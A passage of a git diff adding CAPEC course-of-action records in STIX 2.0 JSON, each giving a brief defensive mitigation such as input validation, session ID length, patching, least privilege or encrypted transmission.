a/capec/course-of-action/course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955.json b/capec/course-of-action/course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955.json new file mode 100644 index 0000000000..47e4020317 --- /dev/null +++ b/capec/course-of-action/course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--17994399-a2aa-48aa-ba57-314472c98830", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b0b48a10-a129-4478-9f9d-d57d7897b955", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-31-1", + "description": "Design: Generate and validate MAC for cookies", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39.json b/capec/course-of-action/course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39.json new file mode 100644 index 0000000000..2e4808e1eb --- /dev/null +++ b/capec/course-of-action/course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b5c23f56-caa9-433b-8cb5-d1d6473cb2c1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-477-0", + "description": "Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1.json b/capec/course-of-action/course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1.json new file mode 100644 index 0000000000..b5457dd9fd --- /dev/null +++ b/capec/course-of-action/course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--274110f3-d39d-4ba4-b58d-13851c7dd714", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-240-1", + "description": "Perform input validation for all content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e.json b/capec/course-of-action/course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e.json new file mode 100644 index 0000000000..988a680587 --- /dev/null +++ b/capec/course-of-action/course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--779da6e4-f213-4083-b70c-16438df4ae0d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-583-0", + "description": "Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946.json b/capec/course-of-action/course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946.json new file mode 100644 index 0000000000..1bd901141e --- /dev/null +++ b/capec/course-of-action/course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--861c02c3-7f47-4593-92c5-83a3302e0759", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b302b0b6-167c-4501-a44c-0e0087f9e946", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-107-1", + "description": "Patch web browser against known security origin policy bypass exploits.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f.json b/capec/course-of-action/course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f.json new file mode 100644 index 0000000000..9ab214c648 --- /dev/null +++ b/capec/course-of-action/course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--339410c6-3e76-4769-89b7-4d6e18a29174", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-65-2", + "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad.json b/capec/course-of-action/course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad.json new file mode 100644 index 0000000000..4de13f9e80 --- /dev/null +++ b/capec/course-of-action/course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c20a7a75-e744-4cd6-be85-59535406888d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-71-1", + "description": "Ensure that filtering or input validation is applied to canonical data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b4faff18-8772-40e7-babb-756dd6a05950.json b/capec/course-of-action/course-of-action--b4faff18-8772-40e7-babb-756dd6a05950.json new file mode 100644 index 0000000000..4293d3491a --- /dev/null +++ b/capec/course-of-action/course-of-action--b4faff18-8772-40e7-babb-756dd6a05950.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8ad7834-eaa3-4802-bdbc-c2184d65e885", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b4faff18-8772-40e7-babb-756dd6a05950", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-1", + "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a.json b/capec/course-of-action/course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a.json new file mode 100644 index 0000000000..df60a36d9b --- /dev/null +++ b/capec/course-of-action/course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3ae71b1e-d865-421e-968e-4728739eb681", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-59-1", + "description": "Use adequate length session IDs", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa.json b/capec/course-of-action/course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa.json new file mode 100644 index 0000000000..8b49c82ba9 --- /dev/null +++ b/capec/course-of-action/course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1fe9fb71-dd45-47b0-a859-a51ff1248429", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-78-6", + "description": "Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d.json b/capec/course-of-action/course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d.json new file mode 100644 index 0000000000..9442db80ac --- /dev/null +++ b/capec/course-of-action/course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4b5b44e1-2079-4e99-a62f-6a9a2a1f2772", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b6192d22-5e14-40ee-9840-023bb3eb017d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-108-1", + "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab.json b/capec/course-of-action/course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab.json new file mode 100644 index 0000000000..2d3e865dae --- /dev/null +++ b/capec/course-of-action/course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fc8e73cf-ae5b-4b50-b09a-5665b5b7a303", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-203-2", + "description": "Employ robust identification and audit/blocking via whitelisting of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b669e453-8bfb-4dd3-bee9-992473335348.json b/capec/course-of-action/course-of-action--b669e453-8bfb-4dd3-bee9-992473335348.json new file mode 100644 index 0000000000..709e0e1e9f --- /dev/null +++ b/capec/course-of-action/course-of-action--b669e453-8bfb-4dd3-bee9-992473335348.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f89798cf-1ae5-448c-ad48-98d75664de52", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b669e453-8bfb-4dd3-bee9-992473335348", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-1", + "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b6bea51f-2de9-4093-b738-636c45211da1.json b/capec/course-of-action/course-of-action--b6bea51f-2de9-4093-b738-636c45211da1.json new file mode 100644 index 0000000000..6268a83c98 --- /dev/null +++ b/capec/course-of-action/course-of-action--b6bea51f-2de9-4093-b738-636c45211da1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6967b4cb-c5b6-48e3-a2f0-0de648d26155", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b6bea51f-2de9-4093-b738-636c45211da1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-485-0", + "description": "Ensure cryptographic elements have been sufficiently tested for weaknesses.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f.json b/capec/course-of-action/course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f.json new file mode 100644 index 0000000000..227f13b9b2 --- /dev/null +++ b/capec/course-of-action/course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--edc4336c-76c6-427a-ba77-736fac664fc3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-23-4", + "description": "Implementation: Virus scanning on host", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109.json b/capec/course-of-action/course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109.json new file mode 100644 index 0000000000..80c5341c9c --- /dev/null +++ b/capec/course-of-action/course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5a91460a-979e-44d9-b3b8-c31d247d49f7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-95-2", + "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0.json b/capec/course-of-action/course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0.json new file mode 100644 index 0000000000..151a277f4f --- /dev/null +++ b/capec/course-of-action/course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cab5204d-f10f-4749-9d4c-d9ea17fcb2bd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-101-1", + "description": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28.json b/capec/course-of-action/course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28.json new file mode 100644 index 0000000000..e46a224835 --- /dev/null +++ b/capec/course-of-action/course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4f009991-4ba1-403e-abf7-0dbf4cc9356f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-66-0", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856.json b/capec/course-of-action/course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856.json new file mode 100644 index 0000000000..5dd41767f1 --- /dev/null +++ b/capec/course-of-action/course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--16d684d5-b743-4cae-a9e5-04971c7c5d00", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b90350bd-fb0d-4a5a-80eb-8771694cc856", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-57-0", + "description": "Implementation: Implement message level security such as HMAC in the HTTP communication", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae.json b/capec/course-of-action/course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae.json new file mode 100644 index 0000000000..967834d266 --- /dev/null +++ b/capec/course-of-action/course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d57f2050-6515-4154-bcca-aa6be2af3c8c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-104-1", + "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33.json b/capec/course-of-action/course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33.json new file mode 100644 index 0000000000..db5f278af3 --- /dev/null +++ b/capec/course-of-action/course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8cee0665-cb19-40ac-8d10-20918f6f176d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ba32356f-23b8-41f2-8a45-b078742a4b33", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-503-0", + "description": "To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879.json b/capec/course-of-action/course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879.json new file mode 100644 index 0000000000..e0994eba66 --- /dev/null +++ b/capec/course-of-action/course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4affa57d-df42-46cc-9c81-2a8b14c923d7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-632-1", + "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f.json b/capec/course-of-action/course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f.json new file mode 100644 index 0000000000..25c00edba7 --- /dev/null +++ b/capec/course-of-action/course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--83bf10c3-caad-4b9b-909d-e379e64f6b1c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-146-2", + "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21.json b/capec/course-of-action/course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21.json new file mode 100644 index 0000000000..e2c181625f --- /dev/null +++ b/capec/course-of-action/course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6ed59e1b-c4a4-49b3-8296-ab583d7e5922", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bb6c6e5d-5144-4ef1-8f27-669fe1fddc21", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-610-0", + "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027.json b/capec/course-of-action/course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027.json new file mode 100644 index 0000000000..3401bfaae2 --- /dev/null +++ b/capec/course-of-action/course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44a51309-a9e6-4a34-a097-140eabd107ad", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bb884809-8a2e-4b93-a88a-ee0fa0e80027", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-1", + "description": "Shut down unnecessary services/ports.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8.json b/capec/course-of-action/course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8.json new file mode 100644 index 0000000000..c880ff1c44 --- /dev/null +++ b/capec/course-of-action/course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e92eb753-915d-49e1-bf23-b5314ee2b06f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-651-2", + "description": "If possible, physically disable the microphone on your machine if it is not needed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2.json b/capec/course-of-action/course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2.json new file mode 100644 index 0000000000..d4fbbe86bc --- /dev/null +++ b/capec/course-of-action/course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--53e87fd1-4a91-4e10-b849-c9faed986c2a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bbca4034-a547-4794-aa48-3d96f0bdefc2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-480-1", + "description": "Abide by the least privilege principle to avoid assigning users more privileges than necessary.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be.json b/capec/course-of-action/course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be.json new file mode 100644 index 0000000000..7ec7009e6d --- /dev/null +++ b/capec/course-of-action/course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cb7c721e-0f42-4deb-b21c-50af24005cde", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bc0985a3-6d23-4682-a463-47c3f62257be", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-53-0", + "description": "Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4.json b/capec/course-of-action/course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4.json new file mode 100644 index 0000000000..79e03111fe --- /dev/null +++ b/capec/course-of-action/course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e9093e68-342e-443a-8f4b-5d870a2d0701", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-117-0", + "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12.json b/capec/course-of-action/course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12.json new file mode 100644 index 0000000000..ca51d5f25f --- /dev/null +++ b/capec/course-of-action/course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--30d572ef-4e06-4a2f-96e7-a30ac71aef2c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--bc687e12-91f9-4cde-a966-fb3b844b9e12", + 